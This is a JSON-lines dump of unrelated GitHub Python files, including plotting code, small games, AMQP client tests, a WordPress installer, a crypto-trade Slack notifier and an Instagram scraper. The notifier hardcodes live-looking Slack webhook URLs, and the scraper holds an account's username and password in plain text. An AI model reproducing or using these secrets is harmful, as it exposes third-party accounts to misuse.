True)\r\nsa_for_df5['Argentina'].interpolate(method = 'cubic',\r\n limit_direction = 'backward',\r\n inplace = True)\r\n\r\n# defining figure and axis for plotting\r\nfig10, ax10 = plt.subplots(2,2,\r\n figsize = (16, 8),\r\n sharey = True,\r\n sharex = True)\r\n\r\n# plotting using subplots\r\nax10[0,0].plot(sa_for_df2['Year'],\r\n sa_for_df2['Argentina'],\r\n color = 'purple')\r\nax10[0,1].plot(sa_for_df3['Year'],\r\n sa_for_df3['Argentina'], \r\n color = 'pink')\r\nax10[1,0].plot(sa_for_df4['Year'],\r\n sa_for_df4['Argentina'], \r\n color = 'green')\r\nax10[1,1].plot(sa_for_df5['Year'],\r\n sa_for_df5['Argentina'], \r\n color = 'orange')\r\n\r\n# setting extras for visualisation of figure 10\r\nax10[0,0].set_ylabel('Forest Area')\r\nax10[1,0].set_ylabel('Forest Area')\r\n\r\n# rotating the x axis\r\nax10[1,0].tick_params(axis = 'x',\r\n labelrotation = 90)\r\nax10[1,1].tick_params(axis = 'x',\r\n labelrotation = 90)\r\n\r\n# set titles \r\nax10[0,0].set_title('Original Data')\r\nax10[0,1].set_title('Linear Interpolation')\r\nax10[1,0].set_title('K-Nearest Neighbour Interpolation')\r\nax10[1,1].set_title('Cubic Interpolation')\r\n\r\n# showing the figure\r\nplt.show()\r\n\r\n'''\r\ncubic interpolation appears to fit the data the best. 
\r\nTherefore, if I was using this data any further I would \r\napply the cubic interpolation for analysis/comparative studies.\r\n'''\r\n\r\n# saving the figure\r\nplt.savefig('C:/Users/sjjby/Documents/Applied Data Science 1/Assignment 2/figure10.png')\r\n\r\n\r\n\"\"\" The END \"\"\"\r\n","repo_name":"sarahjaynebyrne/ADS1_assignment2","sub_path":"Final Code Version2.py","file_name":"Final Code Version2.py","file_ext":"py","file_size_in_byte":35421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"20285645744","text":"from cat import Cat\ncat1 = Cat('Sam', 'male', '10')\ncat2 = Cat('Aleks', 'male', '5')\ncat3 = Cat('Niki', 'female', '3')\ncats = [(cat1.getname(), cat1.getgender(), cat1.getage()),\n        (cat2.getname(), cat2.getgender(), cat2.getage()),\n        (cat3.getname(), cat3.getgender(), cat3.getage())]\nprint(\"List of male and female cats:\")\nfor cat in cats:\n    print(\",\".join(cat))\n\n","repo_name":"marinessa1/practice-module16","sub_path":"testCat.py","file_name":"testCat.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38172020731","text":"'''\nCreated on Sep 27, 2018\n\n@author: ITAUser\n'''\n#testme\nkeepPlaying = True\nwhile(keepPlaying):\n# Welcomes the player and tells them the rules\n    print(\"Welcome to Rock Paper Scissors!\")\n    print(\"Best two out of three. Press 'q' to quit\")\n    \n# 1 = Rock\n# 2 = Scissors\n# 3 = Paper\n    \n# imports the 'random' module, which selects random values in a given range\n    import random\n    \n# sets each player's initial score to zero\n    cpuScore = 0\n    humanScore = 0\n    \n# loop that repeats each round until the human or cpu scores 2 points\n    while(humanScore < 2 and cpuScore < 2):\n        \n# assigns the variable 'cpuChoice' a random integer between 1 and 3\n        cpuChoice = random.randint(1,3)\n        \n# prompts the user to input their choice of rock, paper, or scissors\n        choice = input(\"Please choose(Rock, Paper, Scissors): \")\n        \n# checks if the user quits\n        if( (choice == 'q') or (choice == 'Q') ):\n            keepPlaying = False\n            break\n        \n# checks if it's a draw\n        elif((choice.lower() == 'rock' and cpuChoice == 1)\n             or (choice.lower() == 'scissors' and cpuChoice == 2) \n             or (choice.lower() == 'paper' and cpuChoice == 3)):\n            print(\"DRAW\")\n            print (\"Human:\" + str(humanScore) , \"CPU:\" + str(cpuScore))\n        \n        \n# checks if human wins \n        elif((choice.lower() == 'rock' and cpuChoice == 2) \n             or (choice.lower() == 'scissors' and cpuChoice == 3) \n             or (choice.lower() == 'paper' and cpuChoice == 1)):\n            humanScore = humanScore + 1\n            print (\"Human:\" + str(humanScore) , \"CPU:\" + str(cpuScore))\n        \n# checks if CPU wins\n        elif((choice.lower() == 'rock' and cpuChoice == 3) \n             or (choice.lower() == 'scissors' and cpuChoice == 1) \n             or (choice.lower() == 'paper' and cpuChoice == 2)):\n            cpuScore = cpuScore + 1\n            print (\"Human:\" + str(humanScore) , \"CPU:\" + str(cpuScore))\n\n        else: \n            print (\"Not a valid input, try again.\")\nprint (\"Thanks for playing!\")\nif(humanScore == 2):\n    print(\"You WIN!!!!\")\nif(cpuScore == 2):\n    print(\"You LOSE!!!\")\nprint (\"Human:\" + str(humanScore) , \"CPU:\" + 
str(cpuScore))\n","repo_name":"cmangeles2020/rockpaperscissor","sub_path":"rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24553637488","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class is aim to install wordpress project in lnmp server(Linux, Nginx, Mysql and PHP) into your host.\n\nUsage:\n $ sudo pip install ezhost\n $ ezhost -s lnmp-wordpress -p news -H 127.0.0.1:2201 -U vagrant -P vagrant\n\nAuthor: Zhe Xiao\nGithub: https://github.com/zhexiao/ezhost.git\n\"\"\"\nfrom io import StringIO\n\n# fabric libs\nfrom fabric.colors import red, green\nfrom fabric.api import prompt, sudo, put\nfrom fabric.contrib.files import exists\nfrom fabric.state import output\nfrom fabric.context_managers import cd\n\nfrom ezhost.ServerCommon import ServerCommon\nfrom ezhost.ServerLnmp import ServerLnmp\n\n# hide exec command\noutput['running'] = False\n\n\nclass ServerLnmpWordpress(ServerCommon):\n\n def __init__(self, args, **kwargs):\n self.args = args\n self.project = self.args.project\n\n def install(self):\n # install lnmp server\n ServerLnmp(self.args).install()\n self.install_wordpress()\n\n def install_wordpress(self):\n if self.args.force or prompt(red(' * Install Wordpress (y/n)?'), default='y') == 'y':\n # create project web server config file if not exist\n with cd('/etc/nginx/sites-available'):\n if not exists(self.project):\n sudo('touch {0}'.format(self.project))\n\n # check the php version is php5 or php7\n try:\n sudo('php5-fpm -v')\n # save wordpress config\n put(StringIO(self.nginx_web_wordpress_config), self.project, use_sudo=True)\n except:\n sudo('php-fpm7.0 -v')\n # save wordpress config\n put(StringIO(self.nginx_php7_web_wordpress_config), self.project, use_sudo=True)\n\n # go to web root\n with cd(self.nginx_web_dir):\n # download latest wordpress, extract and change mode\n sudo('wget https://wordpress.org/latest.tar.gz')\n sudo('tar -zxvf latest.tar.gz')\n sudo('sudo chown -R www-data:www-data wordpress')\n\n # rename wordpress project\n sudo('mv wordpress {0}'.format(self.project))\n\n # create uploads folder\n sudo('mkdir {0}/wp-content/uploads'.format(self.project))\n sudo('chown -R www-data:www-data {0}/wp-content/uploads'.format(self.project))\n\n # go to nginx enabled config\n with cd('/etc/nginx/sites-enabled'):\n if exists(self.project):\n sudo('rm {0}'.format(self.project))\n\n # remove the default nginx config\n if exists('default'):\n sudo('rm default')\n\n # move project web server config file from avaiable to enable folder\n sudo('ln -s /etc/nginx/sites-available/{0} .'.format(self.project))\n\n # restart server\n try:\n sudo('service php5-fpm restart')\n except:\n sudo('service php7.0-fpm restart')\n sudo('service nginx restart')\n\n print(green(' * Installed Wordpress project {0} in the system.'.format(self.project)))\n\n print(green(' * Done'))\n print()\n\n def vagrant_workspace(self):\n if prompt(red(' * Are you working on the vagrant server (y/n)?'), default='y') == 'y':\n sudo('mv /var/www/html/ /vagrant/')\n sudo('cd /var/www/ && ln -s /vagrant/html/ .')\n","repo_name":"zhexiao/ezhost","sub_path":"ezhost/ServerLnmpWordpress.py","file_name":"ServerLnmpWordpress.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"2694686726","text":"from dataclasses import dataclass, field\n\nfrom game.packets.base 
import GameServerPacket\n\n\n@dataclass\nclass Snoop(GameServerPacket):\n type: Int8 = field(default=213, init=False, repr=False)\n conversation_id: Int32\n receiver: UTFString\n text_type: Int32\n speaker: UTFString\n message: UTFString\n\n def encode(self, session):\n encoded = self.type.encode()\n\n sorted_args = [\n self.conversation_id,\n self.receiver,\n Int32(0),\n self.text_type,\n self.speaker,\n self.message,\n ]\n for item in sorted_args:\n encoded.append(item)\n return encoded\n","repo_name":"L2py/L2py","sub_path":"game/game/packets/snoop.py","file_name":"snoop.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35404360430","text":"import asyncio\nimport logging\nimport platform\nimport typing\nfrom unittest import mock\nimport uuid\n\nfrom pamqp import commands, constants, frame, heartbeat\n\nfrom aiorabbit import channel0, exceptions, state, version\nfrom . import testing\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass TestCase(testing.AsyncTestCase):\n\n HEARTBEAT_INTERVAL = 10\n SERVER_HEARTBEAT_INTERVAL = 30\n MAX_CHANNELS = 256\n SERVER_MAX_CHANNELS = 32768\n\n def setUp(self):\n super().setUp()\n self.blocked = asyncio.Event()\n self.username = str(uuid.uuid4())\n self.password = str(uuid.uuid4())\n self.locale = str(uuid.uuid4())\n self.product = str(uuid.uuid4())\n self.virtual_host = '/'\n self.heartbeat = asyncio.Event()\n self.loop = asyncio.get_event_loop()\n self.on_remote_close = mock.Mock()\n self.server_properties = {\n 'capabilities': {'authentication_failure_close': True,\n 'basic.nack': True,\n 'connection.blocked': True,\n 'consumer_cancel_notify': True,\n 'consumer_priorities': True,\n 'direct_reply_to': True,\n 'per_consumer_qos': True,\n 'publisher_confirms': True},\n 'cluster_name': 'mock@{}'.format(str(uuid.uuid4())),\n 'platform': 'Python {}'.format(platform.python_version()),\n 'production': 'aiorabbit',\n 'version': version\n }\n self.transport = mock.create_autospec(asyncio.Transport)\n self.transport.write = self._transport_write\n self.channel0 = channel0.Channel0(\n self.blocked,\n self.username,\n self.password,\n self.virtual_host,\n self.HEARTBEAT_INTERVAL,\n self.locale,\n self.loop,\n self.MAX_CHANNELS,\n self.product,\n self.on_remote_close)\n\n def _connection_start(self):\n self.channel0.process(\n commands.Connection.Start(\n server_properties=self.server_properties))\n\n def _connection_tune(self):\n self.channel0.process(\n commands.Connection.Tune(\n self.SERVER_MAX_CHANNELS, constants.FRAME_MAX_SIZE,\n self.SERVER_HEARTBEAT_INTERVAL))\n\n def _connection_open_ok(self):\n self.channel0.process(commands.Connection.OpenOk())\n\n def _connection_close_ok(self):\n self.channel0.process(commands.Connection.CloseOk())\n\n def _transport_write(self, value: bytes) -> typing.NoReturn:\n count, channel, frame_value = frame.unmarshal(value)\n self.assertEqual(count, len(value), 'All bytes used')\n self.assertEqual(channel, 0, 'Frame was published on channel 0')\n if frame_value.name == 'ProtocolHeader':\n self.loop.call_soon(self._connection_start)\n elif frame_value.name == 'Connection.StartOk':\n self.loop.call_soon(self._connection_tune)\n elif frame_value.name == 'Connection.TuneOk':\n pass\n elif frame_value.name == 'Connection.Open':\n self.loop.call_soon(self._connection_open_ok)\n elif frame_value.name == 'Connection.Close':\n self.loop.call_soon(self._connection_close_ok)\n elif frame_value.name == 'Connection.CloseOk':\n pass\n 
elif frame_value.name == 'Heartbeat':\n self.heartbeat.set()\n else:\n raise RuntimeError(count, channel, frame_value)\n\n async def open(self):\n self.assert_state(state.STATE_UNINITIALIZED)\n await self.channel0.open(self.transport)\n\n def assert_state(self, value):\n self.assertEqual(\n self.channel0.state_description(value), self.channel0.state)\n\n def test_negotiation(self):\n self.loop.run_until_complete(self.open())\n\n\nclass ProtocolMismatchTestCase(TestCase):\n\n def _connection_start(self):\n self.channel0.process(\n commands.Connection.Start(\n version_major=1, version_minor=0,\n server_properties=self.server_properties))\n\n def test_negotiation(self):\n with self.assertRaises(exceptions.ClientNegotiationException):\n self.loop.run_until_complete(self.open())\n self.assert_state(state.STATE_EXCEPTION)\n\n\nclass RemoteCloseTestCase(TestCase):\n\n def test_with_remote_200(self):\n self.loop.run_until_complete(self.open())\n self.channel0.process(commands.Connection.Close(200, 'OK'))\n self.assert_state(channel0.STATE_CLOSEOK_SENT)\n\n def test_with_invalid_path(self):\n self.loop.run_until_complete(self.open())\n self.channel0.process(\n commands.Connection.Close(402, 'INVALID-PATH'))\n self.on_remote_close.assert_called_once_with(402, 'INVALID-PATH')\n\n\nclass ClientCloseTestCase(TestCase):\n\n def test_close(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.loop.run_until_complete(self.channel0.close())\n self.assert_state(channel0.STATE_CLOSEOK_RECEIVED)\n\n\nclass ConnectionBlockedTestCase(TestCase):\n\n def test_block_unblock(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.channel0.process(commands.Connection.Blocked())\n self.assert_state(channel0.STATE_BLOCKED_RECEIVED)\n self.assertTrue(self.channel0.blocked.is_set())\n self.channel0.process(commands.Connection.Unblocked())\n self.assert_state(channel0.STATE_UNBLOCKED_RECEIVED)\n self.assertFalse(self.channel0.blocked.is_set())\n\n\nclass HeartbeatTestCase(TestCase):\n\n def test_heartbeat(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.channel0.process(heartbeat.Heartbeat())\n self.assert_state(channel0.STATE_HEARTBEAT_SENT)\n self.assertTrue(self.heartbeat.is_set())\n\n\nclass NoHeartbeatTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = 0\n SERVER_HEARTBEAT_INTERVAL = 0\n\n def test_negotiated_interval(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.assertEqual(self.channel0._heartbeat_interval, 0)\n\n\nclass NoClientHeartbeatTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = None\n SERVER_HEARTBEAT_INTERVAL = 0\n\n def test_negotiated_interval(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.assertEqual(self.channel0._heartbeat_interval, 0)\n\n\nclass SmallerClientHeartbeatTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = 10\n SERVER_HEARTBEAT_INTERVAL = 30\n\n def test_negotiated_interval(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.assertEqual(self.channel0._heartbeat_interval, 10)\n\n\nclass HeartbeatCheckTestCase(TestCase):\n\n HEARTBEAT_INTERVAL = 5\n\n def test_within_range(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n self.channel0._last_heartbeat = self.loop.time() - 5\n 
self.channel0._heartbeat_check()\n self.assertIsInstance(\n self.channel0._heartbeat_timer, asyncio.TimerHandle)\n self.on_remote_close.assert_not_called()\n\n def test_too_many_missed(self):\n self.loop.run_until_complete(self.open())\n self.assert_state(channel0.STATE_OPENOK_RECEIVED)\n current_time = self.loop.time()\n with mock.patch.object(self.loop, 'time') as time:\n time.return_value = current_time + (self.HEARTBEAT_INTERVAL * 4)\n self.channel0.update_last_heartbeat()\n self.channel0._last_heartbeat -= (self.HEARTBEAT_INTERVAL * 3)\n self.channel0._heartbeat_check()\n self.on_remote_close.assert_called_once_with(\n 599, 'Too many missed heartbeats')\n\n\nclass InvalidFrameTestCase(TestCase):\n\n def test_invalid_frame_state(self):\n self.channel0.process(commands.Basic.Cancel('foo'))\n self.assert_state(state.STATE_EXCEPTION)\n self.assertIsInstance(self.channel0._exception,\n exceptions.AIORabbitException)\n\n\nclass ResetTestCase(TestCase):\n\n def test_reset_attributes(self):\n self.loop.run_until_complete(self.open())\n self.assertDictEqual(self.channel0.properties, self.server_properties)\n self.channel0.reset()\n self.assertDictEqual(self.channel0.properties, {})\n","repo_name":"gmr/aiorabbit","sub_path":"tests/test_channel0.py","file_name":"test_channel0.py","file_ext":"py","file_size_in_byte":8679,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"34"} +{"seq_id":"29171759590","text":"from common import * \n\ndef fib():\n \"\"\"returns the fibonacci series up to a max value of num\"\"\"\n a = 1\n b = 1\n yield {\"i\":1,\"num\":a} # cheap fix for forcing F1 and F2 = 1\n yield {\"i\":2,\"num\":b}\n c = a + b\n\n i = 3\n while True:\n c = a + b\n yield {\"i\":i,\"num\":c}\n a=b\n b=c\n i+=1\n\nfor n in fib():\n print(str(n[\"i\"])+\": \"+str(n[\"num\"])+\" has \"+str(countDigits(n[\"num\"]))+\" digits.\")\n if countDigits(n[\"num\"])>=1000:\n answer = n[\"num\"]\n break\n\n#print(str(answer))\n","repo_name":"verdande2/Project-Euler-Python","sub_path":"problem25.py","file_name":"problem25.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34975410339","text":"#gc12\nimport time\n\nsiblingcount = int(input(\"How many siblings?: \"))\nx = 10\nt = x/siblingcount\n\nfor x in range(siblingcount):\n print(\"Next person up! 
\\n\")\n    time.sleep(t)\nprint(\"Time's up for everyone!\")\n","repo_name":"sonbun/pythonchallenges","sub_path":"GC/gc12.py","file_name":"gc12.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"18087684492","text":"# -*- coding: utf-8 -*-\nimport sys\n\nfrom datetime import datetime\nfrom carbi.config import CarbiConfigKeys\nfrom carbi.module.trade.notifier import notify_slack\nfrom carbi.module.trade.notifier.content.notify_trade_execution_result import NotifyTradeExecutionResultMessageContent\nfrom carbi.module.trade.notifier.content.notify_trasfer_needed import NotifyTransferNeededMessageContent\nfrom carbi.module.trade.notifier.content.notify_balancing_task_result import NotifyBalancingTaskResultMessageContent\nfrom carbi.module.trade.notifier.content.notify_balance_status import NotifyBalanceStatusMessageContent\nfrom carbi.utils.dyprops import DynamicProperties\n\nSLACK_URLS = DynamicProperties(\n    ALARM_URL='https://hooks.slack.com/services/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',\n    STATUS_URL='https://hooks.slack.com/services/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',\n    TX_URL='https://hooks.slack.com/services/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',\n)\n\n\nclass TradeNotifier(object):\n    def __init__(self, injector):\n        self.injector = injector\n        self.logger = injector.logger\n        self.last_sent_balance_status = None\n\n    def notify_result(self, result):\n        \"\"\"\n        Notify Slack of the trade result, and of any coin transfer that the trade makes necessary.\n        \"\"\"\n        if not self.injector.config[CarbiConfigKeys.SLACK_ENABLED]:\n            return\n        self._notify_trade_execution_result(result)\n        self._notify_trade_execution_error(result)\n        self._notify_transfer_needed(result)\n\n    def _notify_trade_execution_result(self, result):\n        try:\n            url = SLACK_URLS.TX_URL\n            content = NotifyTradeExecutionResultMessageContent(result)\n            notify_slack(url, content)\n        except Exception as e:\n            self.logger.error(e, exc_info=sys.exc_info())\n\n    def _notify_trade_execution_error(self, result):\n        if result.is_trade_execution_succeed:\n            return\n        try:\n            url = SLACK_URLS.ALARM_URL\n            content = NotifyTradeExecutionResultMessageContent(result)\n            notify_slack(url, content)\n        except Exception as e:\n            self.logger.error(e, exc_info=sys.exc_info())\n\n    def _notify_transfer_needed(self, result):\n        if not result.is_transfer_needed:\n            return\n        try:\n            url = SLACK_URLS.ALARM_URL\n            content = NotifyTransferNeededMessageContent(result)\n            notify_slack(url, content)\n        except Exception as e:\n            self.logger.error(e, exc_info=sys.exc_info())\n\n    def notify_balancing_task_result(self, result, balancing_task):\n        \"\"\"\n        Notify Slack of the outcome of correcting the coin-quantity discrepancies that trades produce.\n        \"\"\"\n        if not self.injector.config[CarbiConfigKeys.SLACK_ENABLED]:\n            return\n        try:\n            url = SLACK_URLS.ALARM_URL\n            content = NotifyBalancingTaskResultMessageContent(result, balancing_task)\n            notify_slack(url, content)\n        except Exception as e:\n            self.logger.error(e, exc_info=sys.exc_info())\n\n    def notify_balance_status(self, market_ctx, balance_ctx):\n        \"\"\"\n        Periodically notify Slack with information on the current balance of the fund.\n        \"\"\"\n        if not self._should_notify_balance_status():\n            return\n        try:\n            url = SLACK_URLS.STATUS_URL\n            content = NotifyBalanceStatusMessageContent(market_ctx, balance_ctx)\n            notify_slack(url, content)\n            self.last_sent_balance_status = datetime.now()\n        except Exception as e:\n            self.logger.error(e, exc_info=sys.exc_info())\n\n    def _should_notify_balance_status(self):\n        if not self.injector.config[CarbiConfigKeys.SLACK_ENABLED]:\n            return False\n        now = datetime.now()\n        if not self.last_sent_balance_status:\n            return True\n        if self._equal_in_minute_scale(self.last_sent_balance_status, now):\n            return False\n        if now.minute % 60 == 0:\n            return True\n        return False\n\n    def _equal_in_minute_scale(self, dt1, dt2):\n        \"\"\"\n        Returns True when dt1 and dt2 have the same year, month, day, hour and minute values.\n        :param dt1: datetime.datetime\n        :param dt2: datetime.datetime\n        :return:\n        \"\"\"\n        return dt1.year == dt2.year and dt1.month == dt2.month and dt1.day == dt2.day and dt1.hour == dt2.hour \\\n            and dt1.minute == dt2.minute\n","repo_name":"modulabs/blockchain-lab","sub_path":"season3/ewmkkpe/carbi/carbi/module/trade/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"36872000263","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 25 15:40:00 2018\n\n@author: misskeisha\n\"\"\"\n\ndef substring(s1, s2, k):\n    return s2[k:k+len(s1)] == s1\ndef how_many(s1, s2):\n    count = 0\n    for i in range(len(s2)):\n        if substring(s1, s2, i):\n            count +=1\n    return count\ns1 = input(\"enter first string\")\ns2 = input(\"enter second string\")\nprint(how_many(s1,s2))\n","repo_name":"hibalubbad/hiba.baddie","sub_path":"asst3_hil00/substring.py","file_name":"substring.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72518011297","text":"\"\"\"\nSame as 3sum, quadratic time algorithm\nFor each pair of points, memorize the slope and constant\nin the linear equation. For simplicity use integer coordinate\n\"\"\"\nfrom random import *\nimport numpy as np, pylab as pl\nfrom matplotlib import pyplot, lines\n\ndef collinear(points):\n    lines = {}\n    n = points.shape[1]\n    for i in xrange(0, n):\n        for j in xrange(i + 1, n):\n            x1, y1 = points[0, i], points[1, i]\n            x2, y2 = points[0, j], points[1, j]\n            if x1 == x2:\n                k = 0\n                c = x1\n            else:\n                k = 1.0 * (y2 - y1) / (x2 - x1)\n                c = y1 - k * x1\n            if lines.has_key((k, c)):\n                return lines[(k, c)] + [(x1, y1), (x2, y2)]\n            else:\n                lines[(k, c)] = [(x1, y1), (x2, y2)]\n    return False\n\nif __name__ == '__main__':\n    n = 20 \n    points = np.random.random_integers(-50, 50, (2, n))\n    pts = collinear(points)\n\n    # plot the figure\n    fig = pyplot.figure()\n    ax = pyplot.subplot(111)\n    ax.plot(points[0], points[1], 'ro')\n    if pts != False:\n        pts_coord = np.array(pts).transpose()\n        line = lines.Line2D(pts_coord[0], pts_coord[1], \n            linewidth=2, color='green')\n        ax.add_line(line)\n        ax.plot(pts_coord[0], pts_coord[1], 'bo')\n    pyplot.show()\n","repo_name":"iveney/algorithm","sub_path":"collinear.py","file_name":"collinear.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"43501233573","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup as bs\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options\nimport time\nimport os\nimport re\nfrom urllib.request import urlopen\nimport json\nfrom pandas.io.json import json_normalize\nimport pandas as pd, numpy as np\nimport requests\nclass scrapper:\n\tdef __init__(self):\n\t\tself.chrome_options = Options()\n\t\tself.chrome_options.add_argument(\"--headless\")\n\t\tself.br = 
webdriver.Chrome(executable_path=\"/usr/bin/chromedriver\" , options = self.chrome_options)\n\tdef scrap(self,username, password):\n\t\tself.br.get('https://www.instagram.com/accounts/login/')\n\t\ttime.sleep(3)\n\t\tself.br.find_element_by_name('username').send_keys(username)\n\t\tbeforeTitle = self.br.title\n\t\tself.br.find_element_by_name('password').send_keys(password, Keys.ENTER)\n\t\ttime.sleep(3)\n\t\tafterTitle = self.br.title\n\t\tif beforeTitle==afterTitle:\n\t\t\tprint(\"Bad Login Information\")\n\t\telse:\n\t\t\tprint(\"Login successful\")\n\t\t\tself.br.get('https://www.instagram.com/'+username)\n\t\t\ttime.sleep(5)\n\t\t\tPagelength = self.br.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\t\t\tlinks = []\n\t\t\tsource = self.br.page_source\n\t\t\tdata = bs(source, 'html.parser')\n\t\t\tbody = data.find('body')\n\t\t\tscript = body.findAll('article')[1]\n\t\t\tfor link in script.findAll('a'):\n\t\t\t\tif re.match(\"/p\", link.get('href')):\n\t\t\t\t\tlinks.append('https://www.instagram.com' + link.get('href'))\n\t\t\tresult = pd.DataFrame()\n\t\t\tfor i in range(len(links)):\n\t\t\t\ttry:\n\t\t\t\t\tpage = urlopen(links[i]).read()\n\t\t\t\t\tdata = bs(page, 'html.parser')\n\t\t\t\t\tbody = data.find('body')\n\t\t\t\t\tscript = body.find('script')\n\t\t\t\t\traw = script.text.strip().replace('window._sharedData =', '').replace(';', '')\n\t\t\t\t\tjson_data = json.loads(raw)\n\t\t\t\t\tposts = json_data['entry_data']['PostPage'][0]['graphql']\n\t\t\t\t\tposts = json.dumps(posts)\n\t\t\t\t\tposts = json.loads(posts)\n\t\t\t\t\tx = pd.DataFrame.from_dict(json_normalize(posts), orient='columns')\n\t\t\t\t\tx.columns = x.columns.str.replace(\"shortcode_media.\", \"\")\n\t\t\t\t\tresult = result.append(x)\n\n\t\t\t\texcept:\n\t\t\t\t\tnp.nan\n\t\t\t# Just check for the duplicates\n\t\t\t\n\t\t\tresult = result.drop_duplicates(subset='shortcode')\n\t\t\tresult.index = range(len(result.index))\n\t\t\tprint(len(result.index))\n\t\t\tnewpath = \"/home/rtcl/Deep-fashion/scraped/\" + username + \"/\"\n\t\t\tif not os.path.exists(newpath):\n\t\t\t#print(\"New path created\")\n\t\t\t\tos.makedirs(newpath)\n\t\t\tfor i in range(len(result)):\n\t\t\t\tr = requests.get(result['display_url'][i])\n\t\t\t\twith open(newpath + result['shortcode'][i] + \".jpg\", 'wb+') as f:\n\t\t\t\t\tf.write(r.content)\n\t\tself.br.close()\n\t\tself.br.quit()\nif __name__ == \"__main__\":\n\t\texample = scrapper()\n\t\texample.scrap('shopickdummy', 'shopick1234')\n","repo_name":"skkuse02/2019fall_41class_team6","sub_path":"Backend/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"727263687","text":"from ..schemas import postSchema\r\nfrom fastapi import APIRouter, HTTPException, Depends\r\n\r\nfrom sqlalchemy.orm import Session\r\n\r\nfrom ..repositories.database import SessionLocal\r\nfrom ..repositories import postCrud\r\n\r\n# Dependency\r\ndef get_db():\r\n db = SessionLocal()\r\n try:\r\n yield db\r\n finally:\r\n db.close()\r\n\r\n\r\nrouter = APIRouter(\r\n prefix=\"/posts\",\r\n tags=[\"posts\"],\r\n responses={404: {\"description\": \"Not found\"}}\r\n)\r\n\r\n@router.get(\"/\", response_model=list[postSchema.Post])\r\nasync def posts(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\r\n posts = postCrud.get_posts(db, skip=skip, limit=limit)\r\n return posts\r\n\r\n\r\n@router.get(\"/{post_id}\", 
response_model=postSchema.Post)\r\nasync def post(post_id: int, db: Session = Depends(get_db)):\r\n db_post = postCrud.get_post(db, post_id)\r\n if (db_post is None):\r\n raise HTTPException(status_code=404, detail=\"Post Not Found\")\r\n return db_post\r\n\r\n\r\n@router.post(\"/create_post\", response_model=postSchema.Post)\r\nasync def create_post(newPost: postSchema.PostCreate, db: Session = Depends(get_db)):\r\n db_post = postCrud.create_post(db, newPost)\r\n return db_post\r\n\r\n\r\n@router.post(\"/upvote\", response_model=postSchema.Post)\r\nasync def upvote_post(vote: postSchema.PostVote, db: Session = Depends(get_db)):\r\n id = vote.id\r\n db_post = postCrud.upvote_post(db, id)\r\n return db_post\r\n\r\n\r\n@router.post(\"/downvote\", response_model=postSchema.Post)\r\nasync def downvote_post(vote: postSchema.PostVote, db: Session = Depends(get_db)):\r\n id = vote.id\r\n db_post = postCrud.downvote_post(db, id)\r\n return db_post\r\n\r\n","repo_name":"kpp16/RedditClone","sub_path":"backend/app/routers/postRouter.py","file_name":"postRouter.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34460587375","text":"\"\"\"\r\nCreated on Wed May 18 2022\r\n\r\n@author: Jake Carter\r\nPiE Homework 1 file 2:\r\nIncludes pyramid, findSquares, calSalary, calLetterGrade functions for homework 1\r\n\"\"\"\r\n\r\n\r\ndef pyramid(s:str):\r\n \"\"\"\r\n pyramid(s:str)\r\n Takes a string input (s) and creates a message pyramid out of it\r\n \"\"\"\r\n i = 1\r\n while i <= len(s):\r\n print(s[0:i])\r\n i += 1\r\n\r\ndef findSquares(s:int = 0, e:int = 0):\r\n \"\"\"\r\n findSquares(s:int = 0, e:int = 0)\r\n Takes 2 integer inputs and finds all perfect squares between them\r\n If only one arguement is entered, all perfect squares less than the input will be output\r\n 